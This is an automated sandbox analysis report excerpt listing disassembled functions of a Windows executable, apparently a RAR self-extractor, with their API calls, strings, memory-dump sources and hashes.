                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: be40e4d44194defeb72a8fdf9634125db59628b1996e5adcefbcd6494d2fc00b
                                                                                                                    • Instruction ID: 08a97b7d664700fd119870584608d9ed4860b0b4efbbde586ada28c75704c6e8
                                                                                                                    • Opcode Fuzzy Hash: be40e4d44194defeb72a8fdf9634125db59628b1996e5adcefbcd6494d2fc00b
                                                                                                                    • Instruction Fuzzy Hash: 7D41B7B1A00319ABDF509F68DC49BAEBFACFB44710F244239F915E7291D734A940C7A5
                                                                                                                    Function 00589382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00589387
                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 005893AA
                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 005893C9
                                                                                                                      • Part of subcall function 0058C29A: _wcslen.LIBCMT ref: 0058C2A2
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    • _swprintf.LIBCMT ref: 00589465
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 005894D4
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00589514
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: rtmp%d
                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                    • Opcode ID: 873dc58739c7c96d24d48c57034a78ec8f0838231d917b97f90fa726a58beee2
                                                                                                                    • Instruction ID: 3adfe7b72098a403276cb467b3a250a69cbedeb04bc1da70d4444716eeb5a1bd
                                                                                                                    • Opcode Fuzzy Hash: 873dc58739c7c96d24d48c57034a78ec8f0838231d917b97f90fa726a58beee2
                                                                                                                    • Instruction Fuzzy Hash: B24157B190025A65DF21FB60CC49EEE7B7CBF95340F0448A5BA49F3051DB389B899B60
                                                                                                                    Function 00581100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: UY$pY$zY
                                                                                                                    • API String ID: 176396367-954890476
                                                                                                                    • Opcode ID: 74dbd34baa3c72493973264a818c2138e7c51b7884c961b34bbbafc917b3cce5
                                                                                                                    • Instruction ID: 286de1ed75122113dd3c7d4ef1ce7e3834ac09162e459c9af62c88a206e15132
                                                                                                                    • Opcode Fuzzy Hash: 74dbd34baa3c72493973264a818c2138e7c51b7884c961b34bbbafc917b3cce5
                                                                                                                    • Instruction Fuzzy Hash: 7E417171900A6A5BCB25AB69CC4D9DE7FBCBF51310F000429FD46F7245DB30AE598BA4
                                                                                                                    Function 00599ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00599EEE
                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00599F44
                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00599FDB
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00599FE3
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00599FF9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                    • String ID: Y$RarHtmlClassName
                                                                                                                    • API String ID: 3937224194-3908316781
                                                                                                                    • Opcode ID: b7b280fb96bb1f5a154cdc6f7664601db172f678bf49f8735eb9ad343d1fb203
                                                                                                                    • Instruction ID: c54ac2c56e7e6a943be7e3a7e202d73f246707e8ec1694582f896f0c9814cd6e
                                                                                                                    • Opcode Fuzzy Hash: b7b280fb96bb1f5a154cdc6f7664601db172f678bf49f8735eb9ad343d1fb203
                                                                                                                    • Instruction Fuzzy Hash: 0D419E32004250AFCB295F68DC8DB6BBFA8FB58711F00456DF8899A156DB34D908DFA1
                                                                                                                    Function 00591218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __aulldiv.LIBCMT ref: 0059122E
                                                                                                                      • Part of subcall function 0058B146: GetVersionExW.KERNEL32(?), ref: 0058B16B
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00591251
                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00591263
                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00591274
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591284
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591294
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 005912CF
                                                                                                                    • __aullrem.LIBCMT ref: 00591379
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1247370737-0
                                                                                                                    • Opcode ID: 5de1b05e8820fbd37d1f7dac7e09a05960a2a9ac2880fa2a38f9af6518e83839
                                                                                                                    • Instruction ID: 445a67d3c74256e14ac126e20f8a844e7c802ba69513dd15e085657ca64f9b80
                                                                                                                    • Opcode Fuzzy Hash: 5de1b05e8820fbd37d1f7dac7e09a05960a2a9ac2880fa2a38f9af6518e83839
                                                                                                                    • Instruction Fuzzy Hash: D54105B1508316AFCB50DF65C88496BBBF9FB88314F008A2EF596D2210E734E649DB56
                                                                                                                    Function 00582210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00582536
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                    • Opcode ID: b54cfeb46416a76157084532c0bcf1a37944c2f5fab45ad94903e26fb96f9d41
                                                                                                                    • Instruction ID: 7accfcea2a26df1095ecc438e929d5c035f1657394f71d5c6ecbec1f82f436b7
                                                                                                                    • Opcode Fuzzy Hash: b54cfeb46416a76157084532c0bcf1a37944c2f5fab45ad94903e26fb96f9d41
                                                                                                                    • Instruction Fuzzy Hash: A5F1E5706043429BDF25FB248499BFE7F997BD0300F08496DED86BB283DB6499458B62
                                                                                                                    Function 00599CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                    • Opcode ID: 427bfa9ebc40f30cc6ea01510ce33a1c8b200f95140aca3ae1fae4e0309ff269
                                                                                                                    • Instruction ID: 6a17f3cc69ff5501c031b8d79af1a71c7b2bd5709503c5bf36bf00999f3a243d
                                                                                                                    • Opcode Fuzzy Hash: 427bfa9ebc40f30cc6ea01510ce33a1c8b200f95140aca3ae1fae4e0309ff269
                                                                                                                    • Instruction Fuzzy Hash: 8A513A6A74132395DF309A2D9C517B67BE8FFA1790F68042EFDC18B1C0FB658C8182A1
                                                                                                                    Function 005AF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,005AFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 005AF6CF
                                                                                                                    • __fassign.LIBCMT ref: 005AF74A
                                                                                                                    • __fassign.LIBCMT ref: 005AF765
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 005AF78B
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,005AFE02,00000000,?,?,?,?,?,?,?,?,?,005AFE02,00000000), ref: 005AF7AA
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,005AFE02,00000000,?,?,?,?,?,?,?,?,?,005AFE02,00000000), ref: 005AF7E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: cb573a1636ce1d17ba809961ffe6aad83009c0821f294bf3c9912a165a795758
                                                                                                                    • Instruction ID: 43a524106da8bdedd00c4ca253e5128b79d72c3b172b4f0d1021c0d3b1413c5b
                                                                                                                    • Opcode Fuzzy Hash: cb573a1636ce1d17ba809961ffe6aad83009c0821f294bf3c9912a165a795758
                                                                                                                    • Instruction Fuzzy Hash: 7F5182B59002499FCB10CFA8DC85AEEBFF8FF09300F14456AE555E7255D770AA45CBA0
                                                                                                                    Function 0059CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0059CE9D
                                                                                                                      • Part of subcall function 0058B690: _wcslen.LIBCMT ref: 0058B696
                                                                                                                    • _swprintf.LIBCMT ref: 0059CED1
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,005C946A), ref: 0059CEF1
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0059CF22
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059CFFE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                    • String ID: %s%s%u
                                                                                                                    • API String ID: 689974011-1360425832
                                                                                                                    • Opcode ID: dbaeb4e3f279533c8961719336d322de78ab7e3a8be073869f6a26ec77a350e0
                                                                                                                    • Instruction ID: 86a32cb6bc602dc5ced4e234e406434c74f89b308df52a0a5cec861716a109a8
                                                                                                                    • Opcode Fuzzy Hash: dbaeb4e3f279533c8961719336d322de78ab7e3a8be073869f6a26ec77a350e0
                                                                                                                    • Instruction Fuzzy Hash: B2419FB1800659AADF259B90CC89EEE7FBCFB44301F4084A6F909E7041EB709A48DF71
                                                                                                                    Function 005A2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A2937
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005A293F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A29C8
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005A29F3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A2A48
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 743e199e32280d730ee58b09c77e216a39d3ba6adff5848afb5a87518dc1dfd8
                                                                                                                    • Instruction ID: 7c09d35a4522d3d93f6f4a96824c68e5ff962668005274784d4a3477fc219b27
                                                                                                                    • Opcode Fuzzy Hash: 743e199e32280d730ee58b09c77e216a39d3ba6adff5848afb5a87518dc1dfd8
                                                                                                                    • Instruction Fuzzy Hash: 4A41A434A00219AFCF10DF6CC886A9EBFA5BF46324F148155F8156B292D775EA45CBA0
                                                                                                                    Function 00599955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                    • API String ID: 176396367-3743748572
                                                                                                                    • Opcode ID: 09e67e565605f52b7e2a98ca8a08041a54e247af315c79a8a569b9339448f03c
                                                                                                                    • Instruction ID: 47884ed3b16aa40712f82ddba7a575a688c6252317c2b232f3518b2eff8d484b
                                                                                                                    • Opcode Fuzzy Hash: 09e67e565605f52b7e2a98ca8a08041a54e247af315c79a8a569b9339448f03c
                                                                                                                    • Instruction Fuzzy Hash: 76317D3664434656DE34AF589C43B7A7BE8FB91320F54441FF4824B2C0FBA0AD8183A1
                                                                                                                    Function 005AC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005AC868: _free.LIBCMT ref: 005AC891
                                                                                                                    • _free.LIBCMT ref: 005AC8F2
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005AC8FD
                                                                                                                    • _free.LIBCMT ref: 005AC908
                                                                                                                    • _free.LIBCMT ref: 005AC95C
                                                                                                                    • _free.LIBCMT ref: 005AC967
                                                                                                                    • _free.LIBCMT ref: 005AC972
                                                                                                                    • _free.LIBCMT ref: 005AC97D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction ID: 86c72e66d6beab99f03393876bea0004c286f2fad72c39fcbe684be0cda687c3
                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction Fuzzy Hash: 62110D71580B06AAE620BBB1CC0BFDF7FECBF86B00F404C15B29D66092DB69B5058750
                                                                                                                    Function 0059E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0059E669,0059E5CC,0059E86D), ref: 0059E605
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0059E61B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0059E630
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                    • Opcode ID: 9e8e3aff68f8023cd1779a09e0ad05d1005da83f9784da08d74d576600c8d7b1
                                                                                                                    • Instruction ID: 64f3e1d782189f764f7c5cf7168d1ef792f232798d1458cb3692cb27d8e44276
                                                                                                                    • Opcode Fuzzy Hash: 9e8e3aff68f8023cd1779a09e0ad05d1005da83f9784da08d74d576600c8d7b1
                                                                                                                    • Instruction Fuzzy Hash: 15F022313806624B8F21CE68FCCB6BA2EC87A317813100538D805D7140FB20DC49AA94
                                                                                                                    Function 005A8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 005A891E
                                                                                                                      • Part of subcall function 005A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?), ref: 005A8DE2
                                                                                                                      • Part of subcall function 005A8DCC: GetLastError.KERNEL32(?,?,005AC896,?,00000000,?,00000000,?,005AC8BD,?,00000007,?,?,005ACCBA,?,?), ref: 005A8DF4
                                                                                                                    • _free.LIBCMT ref: 005A8930
                                                                                                                    • _free.LIBCMT ref: 005A8943
                                                                                                                    • _free.LIBCMT ref: 005A8954
                                                                                                                    • _free.LIBCMT ref: 005A8965
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
